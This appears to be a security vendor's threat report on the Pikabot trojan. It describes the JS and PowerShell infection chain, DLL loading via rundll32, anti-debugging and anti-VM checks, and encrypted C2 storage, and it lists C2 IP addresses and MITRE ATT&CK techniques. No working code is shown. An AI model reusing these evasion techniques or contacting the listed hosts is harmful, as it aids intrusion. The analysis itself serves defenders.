New threats emerge regularly in our space, challenging the preparedness of organizations worldwide. One such recent threat is the Pikabot malware, a new and sophisticated trojan that first made its presence known in early 2023. Cybertooth Security, has been closely monitoring and analyzing Pikabot to understand its mechanisms and impact on their victims. In two cases, Pikabot can be found utilizing Cobalt strike to exfiltrate data from their victims and load ransomware encryption scripts which silently delete history and found backups on the OS. The majority of infections often lead to reconnaissance commands like “whoami” and “ipconfig” which allow malicious actors to gain their bearing in these infected systems.
Criminal Use
Pikabot’s Composition and Functionality Pikabot is structured into two main components: a loader and a core module. The loader initiates the infection, performing numerous anti-analysis checks to evade detection, including anti-debugging, anti-VM, and anti-emulation techniques. The core module, once injected, is capable of executing arbitrary commands and payloads from a command-and-control (C2) server, making it a powerful tool for cybercriminals.
Attack Chain
Initial Infection: JS & PowerShell
- Methods: Infection begins with a malicious email link, downloading a JS file, which then downloads the Pikabot DLL. The script, camouflaged with comments related to MIT License from open-source projects, makes it appear legitimate.
- Analysis: Utilizing PowerShell logging and transcript logging revealed the malware’s initial script and subsequent decoded version.
Second Stage: Pikabot Loader
- Unpacking: The final payload is unpacked using tools like unpacme and unpacker.
- Functions: The DLL Manipulation leads to the main malware function, involving API resolution and string decryption.
- API Resolution: Pikabot resolves crucial functions like GetProcAddress and LoadLibraryA to execute its operations.
String Decryption
- Methods: It uses stack strings and bitwise operations for decryption. A pattern of constructing stack strings, looping for decoding, and checking against hardcoded lengths is observed.
Anti-Analysis Techniques
- Pikabot performs extensive anti-debugging checks, including Exception Handlers, debug flag checks, and detection of hardware breakpoints, and many others.
- Noted Anti-VM Tactics: It attempts to load incorrect libraries to detect VMs and sandboxes.
Extracting the Core Module
- Extraction Process: The core module is extracted from multiple PNG files in the resource section, using XOR and AES decryption methods.
Indicators of Compromise (IoCs)
- URLs & IPs: Several URLs and IPs such as 192.229[.]211.108 were part of the script’s variables.
- Executed Commands: rundll32 is used to run the DLL.
- Mutual Exclusivity: A specific mutex value is used to prevent double infection.
Note: This summary is based on the detailed analysis and technical breakdown of Pikabot malware. The information is synthesized to provide a clear understanding of its attack chain and methodologies.
Pikabot’s Unique Mechanisms What sets Pikabot apart is its method of encrypting and storing C2 information maintaining a backdoor as mentioned by Sophos. Unlike other malware, such as previous Qakbot infections, Pikabot does not store C2 information in a single block. Instead, it uses the ADV obfuscator tool for encrypting each component and decodes C2 server IP addresses and ports during runtime using a complex algorithm.
Impact and Scale of Infections Cybertooth Security has observed that Pikabot has been actively used to distribute secondary payloads like Cobalt Strike, indicating its role in multi-staged attack campaigns that could lead to ransomware. The exact scale of Pikabot infections remains challenging to ascertain due to its sophisticated evasion techniques. However, the similarities in its distribution methods to those of the Qakbot trojan suggest a potential for widespread impact.
Conclusion Pikabot represents a significant and evolving challenge in the field of cybersecurity. Its sophisticated design, combined with advanced evasion techniques, makes it a formidable threat. Cybertooth Security emphasizes the importance of continuous monitoring, analysis, and strengthening of cyber defenses to counteract threats like Pikabot. As the malware continues to evolve, staying ahead in the cybersecurity game is more crucial than ever.
IP IOC’s
102.129.139.65
104.238.144.171
109.107.182.10
112.17.156.233
129.153.135.83
144.172.126.136
144.64.204.81
158.247.215.68
185.87.148.132
196.218.123.202
MITRE ATTACK:
TA0002
Execution
TA0003
Persistence
TA0004
Privilege Escalation
TA0005
Defense Evasion
TA0006
Credential Access
TA0007
Discovery
TA0009
Collection
TA0011
Command and
Control
T1129
Shared Modules
T1574
Hijack Execution Flow
T1547.001
Registry Run Keys /
Startup Folder
T1574.002
DLL Side-Loading
T1055
Process Injection
T1027
Obfuscated Files or
Information
T1036
Masquerading
T1112
Modify Registry
T1218
System Binary Proxy
Execution
T1218.010
Regsvr32
T1218.011
Rundll32
T1497
Virtualization/Sandbo
x Evasion
T1056
Input Capture
T1057
Process Discovery
T1082
System Information
Discovery
T1083
File and Directory
Discovery
T1518
Software Discovery
T1518.001
Security Software
Discovery
T1571
Non-Standard Port
Please check our home page for additional references and research here
